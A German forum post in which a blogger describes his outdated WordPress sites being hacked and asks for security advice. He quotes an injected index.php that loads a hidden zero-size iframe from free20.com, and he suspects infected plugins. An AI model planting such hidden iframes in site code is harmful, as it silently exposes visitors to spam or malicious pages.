Hallo,
zwei Wordpress-Blogs von mir habe ich nachlässig behandelt und seit Version 2.05 nicht aktualisiert. Das hat sich nun gerächt: Heute morgen um 4:26 Uhr hat irgendwas oder irgendwer einen Haufen Dateien überschrieben. Nach außen laufen beide Blogs (hansels.de - Ein Blog, Polen-Netzwerk) noch richtig, aber wenn ich mich in den Admin-Bereich einloggen möchte, wird eine Seite namens "free20.com" aufgerufen und ich erhalte böse Spamdinge auf meinem Bildschirm.
Ich bin zugegeben nicht so in den Hintergründen vertraut und habe zur ersten Schadensbegrenzung erst einmal eine ältere gesicherte Version wieder aufgespielt. Nun funktioniert alles wieder, ich habe aber Angst, dass das entweder wieder passiert oder dass sogar jemand nun dauerhaft auf meine Passworte und Inhalte zugreifen kann. Was muss ich tun, damit das nicht passieren kann?
Einschub, nachgetragen: Das habe ich im Code der index.php gefunden, ich frage mich nur, wie man die manipulieren konnte:
Zitat
<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
Ich mache nun ein Update auf die aktuelle Version 2.2. Und werde das auch zukünftig weiter machen. Auch ändere ich die Passworte. Aber: Ich habe Sorge, dass noch Plugins infiziert sein könnten. Ich nutze in den Blogs:
Akismet, CJD Spam, Follow URL, Hello Dolly, o42cleanUmlauts, TimeZone, UpdateMonitor, Database-Backup, WP-Contactform, Shortstat
Weiterhin war ein AdSense-Tool installiert, das aber meiner ersten Einschätzung folgend für das Desaster verantwortlich war. Deswegen habe ich es entfernt. Danach stellte ich aber fest, dass offensichtlich ShortStat auch irgendwie infiziert war; bevor ich eine Datei namens Shortstat nicht löschte, erschien beim Login im Admin-Bereich immer noch die ominöse free20.com-Spamsite.
Habe ich vielleicht irgendwo zu viele Rechte vergeben? Ich würde mich über Sicherheitstipps sehr freuen. Das geniale Wordpress habe ich bisher immer nur als ideales Instrument für einfaches Veröffentlichen gesehen und das Sicherheitsthema einfach zu sehr vernachlässigt. Nach allem, was ich hier im Forum nun dazu las, bin ich doch sehr beunruhigt; scheinbar ist es bei mir zu lange gut gegangen.
Kann mir jemand Absicherungstipps für die Schreibrechte geben? Soll ich noch Plugins löschen? Kann ich doch beruhigter sein, als ich im Moment bin? Schon einmal vielen Dank!
Herzliche Grüße
Jens:confused: